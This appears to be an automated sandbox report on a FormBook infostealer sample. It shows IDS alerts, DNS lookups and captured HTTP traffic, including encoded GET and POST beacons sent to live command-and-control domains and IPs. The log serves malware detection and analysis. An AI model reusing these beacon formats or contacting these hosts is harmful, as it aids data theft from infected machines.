            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49988 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50028 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49998 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49998 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50028 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50032 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50032 -> 85.159.66.93:80
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 63.250.47.40 63.250.47.40
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK date: Tue, 08 Oct 2024 13:55:40 GMT server: Apache set-cookie: __tad=1728395740.6411101; expires=Fri, 06-Oct-2034 13:55:40 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 581 content-type: text/html; charset=UTF-8 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK date: Tue, 08 Oct 2024 13:55:44 GMT server: Apache set-cookie: __tad=1728395744.6678593; expires=Fri, 06-Oct-2034 13:55:44 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 581 content-type: text/html; charset=UTF-8 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK date: Tue, 08 Oct 2024 13:55:46 GMT server: Apache set-cookie: __tad=1728395746.2134099; expires=Fri, 06-Oct-2034 13:55:46 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 581 content-type: text/html; charset=UTF-8 connection: close
            Source: global traffic HTTP traffic detected: GET /2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SoEkaj2DIJpzLN/p7keITu3kRidpknmkeFNiZOa1jl486ZzlEj4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.elsupertodo.net Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /7xi5/?I4ET5=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAz/7PAbspGHYrJhwiAgKAJ54r5fuZ48YeCJJLAh0jfNMUyJhiqw=&5xn03=7vMx2HlPWl HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.omexai.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /fpzw/?I4ET5=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx4v2Cu8U6PY7doS41bFIW7T/4/1mYTXkrfUCe/4cLGyNDvWcha0=&5xn03=7vMx2HlPWl HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.tekilla.wtf Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /3qit/?I4ET5=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQz0a67JVPuK3DRmcV/dEWB275yuHlkBzmr1SLVBbDDm50CRvDPY=&5xn03=7vMx2HlPWl HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.bola88site.one Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /nxfn/?I4ET5=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfWaAaU8Sg/CwIadyJZ1Vunf0ESMtavaN5FCA7KYOqo/KmyEXwiQ=&5xn03=7vMx2HlPWl HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.languagemodel.pro Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /3bdq/?I4ET5=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv0kyrqFFpmLMz7jnyzN+XheUDXt53FO2cfXJKOJNKmSe0FPHbZU=&5xn03=7vMx2HlPWl HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.kexweb.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /ikh0/?5xn03=7vMx2HlPWl&I4ET5=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uL6vU7t5jilJUCYKPYTSTWzBlftPtFsf3/wj5zdrQAyp0VL/hTg= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.jobworklanka.online Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /h7lb/?I4ET5=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U8wzgLDyi+d9/jciraahzpwjZL5E+FLfjf2KFU0ZNlPPutFUmc0=&5xn03=7vMx2HlPWl HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.dyme.tech Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /e0nr/?I4ET5=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL1JCWIKw0rFG3lN0WjCCPv2jnxqsoqX4CWEeQPgrQsdkl4cxLCA=&5xn03=7vMx2HlPWl HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.mizuquan.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic HTTP traffic detected: GET /pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkSAI62mQlNqC9c=&5xn03=7vMx2HlPWl HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.nobartv6.website Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic DNS traffic detected: DNS query: www.woshop.online
            Source: global traffic DNS traffic detected: DNS query: www.kxshopmr.store
            Source: global traffic DNS traffic detected: DNS query: www.elsupertodo.net
            Source: global traffic DNS traffic detected: DNS query: www.omexai.info
            Source: global traffic DNS traffic detected: DNS query: www.tekilla.wtf
            Source: global traffic DNS traffic detected: DNS query: www.bola88site.one
            Source: global traffic DNS traffic detected: DNS query: www.languagemodel.pro
            Source: global traffic DNS traffic detected: DNS query: www.kexweb.top
            Source: global traffic DNS traffic detected: DNS query: www.jobworklanka.online
            Source: global traffic DNS traffic detected: DNS query: www.dyme.tech
            Source: global traffic DNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global traffic DNS traffic detected: DNS query: www.mizuquan.top
            Source: global traffic DNS traffic detected: DNS query: www.nobartv6.website
            Source: global traffic DNS traffic detected: DNS query: www.sailnway.net
            Source: unknown HTTP traffic detected: POST /7xi5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.omexai.info Origin: http://www.omexai.info Content-Type: application/x-www-form-urlencoded Content-Length: 210 Connection: close Cache-Control: max-age=0 Referer: http://www.omexai.info/7xi5/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Ascii: I4ET5=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5yjba/r/QvDkGwMpnkx6olWmEr0HATyE0Tn6yLlf4mn3
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 08 Oct 2024 13:53:51 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 08 Oct 2024 13:53:53 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 08 Oct 2024 13:53:56 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 08 Oct 2024 13:53:58 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 08 Oct 2024 13:54:05 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 08 Oct 2024 13:54:07 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 08 Oct 2024 13:54:10 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 08 Oct 2024 13:54:12 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 08 Oct 2024 13:54:31 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 08 Oct 2024 13:54:34 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 08 Oct 2024 13:54:37 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 08 Oct 2024 13:54:39 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:45 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:47 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:50 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:54:53 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
